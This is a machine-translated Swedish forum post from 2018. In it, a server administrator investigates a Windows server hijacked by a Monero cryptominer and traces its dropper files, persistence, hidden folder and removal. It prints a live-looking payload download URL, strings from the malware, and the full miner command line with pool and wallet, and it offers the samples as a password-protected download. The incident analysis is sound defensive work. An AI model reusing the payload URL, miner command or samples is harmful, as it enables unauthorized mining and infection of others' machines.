Igår eftermiddag upptäckte jag plötsligt att webbplatsen inte kunde öppnas, kollade orsaken och upptäckte att fjärrdatabasporten inte kunde öppnas, så jag loggade in på fjärrdatabasservern.
Jag upptäckte att MySQL-tjänsten har stannat och att CPU:n upptar 100 %, vilket visas i följande figur:
Vid CPU-beläggningssorteringen upptäcktes att "win1ogins.exe" förbrukar mest resurser och upptar 73 % av CPU:n, enligt egen erfarenhet borde detta vara mining-programvara, vilket är att bryta XMR Monero!
Jag upptäckte också processen "MyBu.exe" Yiyu, och jag tänkte, när laddade servern upp programmet som var skrivet i Yiyu? Som visas nedan:
Högerklicka på "MyBu.exe" för att öppna filplatsen, mappplatsen: C:\Windows och sortera sedan efter tid, och hitta 3 nya filer, som visas nedan:
1ndy.exe, MyBu.exe, Mzol.exe dokument
När jag såg dessa konstiga filer kände jag att servern borde ha blivit hackad, jag tittade i Windows-loggarna och såg att inloggningsloggarna hade raderats, och servern var verkligen hackad!
Vi försökte "win1ogins.exe" högerklicka på processen och öppna filplatsen, men upptäckte att den inte gick att öppna!! Ingen reaktion! Ok! Verktyg!!
Verktyget jag använder är "PCHunter64.exe", sök bara och ladda ner det själv
Mappen där "win1ogins.exe" finns är: C:\Windows\Fonts\system(x64)\ som visas i figuren nedan:
Vi kan inte hitta denna mapp i Utforskaren, som visas nedan:
Nästa operation är att kopiera 3 virustrojanfiler till min nyinköpta server för drift!!
Jag kopierade virusfilen till min nyinköpta server och försökte sedan öppna MyBu.exe fil, och upptäckte att MyBu.exe hade blivit självraderad! Och gruvprogramvaran släpps, vi vet att utforskaren inte kan öppna filvägen,
Vi försökte använda powershell-verktyget som följer med den nya versionen av Windows, och upptäckte att gruvprogramvaran finns, och det finns 3 mappar
(Observera att under normala omständigheter: C:\Windows\Fonts har inga mappar under sig!!)
Jag installerade FD:s paketfångstverktyg på min server, vi försökte öppna "1ndy.exe"-programvaran, hittade den och försökte komma åt: http://221.229.204.124:9622/9622.exe borde ladda ner den senaste virustrojanen
Nu är webbplatsen otillgänglig.
Vi försökte öppna "Mzol.exe"-programvaran och upptäckte att programmet inte visste vad det ville göra. Vi öppnar programmet med Notepad, som visas nedan:
LogonServer.exe Spelschack och kort GameServer.exe Baidu dödar mjuka BaiduSdSvc.exe hittade S-U ServUDaemon.exe i att skjuta DUB.exe i skanning av 1433 1433.exe fånga höns S.exe Microsoft Antivirus mssecess.exe SNABB HEAL QUHLPSVC.EXE Dr. An V3 V3Svc.exe Dr. Ahn patray.exe Korean Capsule AYAgent.aye Traffic Ore Miner.exe Trend TMBMSRV.exe Ke Niu knsdtray.exe QQ QQ.exe K7 Antivirus K7TSecurity.exe QQ Computer Butler QQPCRTP.exe Kingsoft Guardian ksafe.exe Norton Antivirus rtvscan.exe Avast Network Security ashDisp.exe Avira avcenter.exe Kingsoft kxetray.exe NOD32 egui.exe McCafe Mcshield.exe Rising Antivirus RavMonD.exe Jiangmin Antivirus KvMonXP.exe Kaspersky avp.exe 360 Antivirus 360sd.exe 360 Security Guard 360tray.exe : %s:%d:%s F r i e n d l y N a m e SysFreeString Oleaut32.dll CoCreateInstance CoUninitialize CoInitialize Ole32.dll %d*%sMHz HARDWARE\DEscrip{filtering}tION\System\CentralProcessor\0 ~MHz c:\%s kernel32.dll IsWow64Process No Information började logga in på SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Windows\1ndy.exe Descrip{filter}tion SYSTEM\CurrentControlSet\Services\%s RtlGetNtVersionsnummer ntdll.dll ANDRA anslutningar UPPTAGNA anslutningar PROXYANSLUTNINGAR LAN-anslutningar MODEMANSLUTNINGAR NULL CTXOPConntion_Class 3389 Portnummer SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s Ej upptäckt Standard RDP-TCP Författare: Shi Yonggang, email:pizzq@sina.com
Personligen antar jag att "Mzol.exe" och "1ndy.exe" faktiskt är samma sak, bara skillnaden mellan den nya och den gamla versionen!
Låt win1ogins.exe titta på uppstartsparametrarna för mjukvaran, som visas nedan:
C:\Windows\Fonts\system(x64)\win1ogins.exe -a cryptonight -o stratum+tcp://pool.supportxmr.com:5555 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p MyBlue -o stratum+tcp://pool.minexmr.com:443 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p x -k --donate-level=1
Om vi verkligen miner XMR Monero öppnar vi mining poolens adress: https://supportxmr.com/ Sök adressen till plånboken, som visas i figuren nedan:
Vi beräknar inkomsten enligt beräkningskraften, gräver 0,42 mynt om dagen och beräknar mer än 1 000 enligt den aktuella marknaden, den dagliga inkomsten är troligen mer än 500 yuan!
Självklart har Monero också stigit till mer än 2 000 yuan!
När det gäller hur man tar bort "win1ogins.exe"-miningviruset kan PCHunter64-programmet ta bort miningviruset manuellt! Att bara avsluta processen fungerar inte, jag har manuellt rensat viruset på min server.
Självklart är det bättre att låta andra göra det för att ta bort viruset, jag är trots allt ingen expert på detta!
Slutligen, bifoga 3 virusfiler och packa upp lösenordet A123456
1ndy.zip
(1.29 MB, Antal nedladdningar: 12, 售价: 1 粒MB)
(Slut)
|
Publicerad på 2018-04-04 12:37:15
|
|
|
|
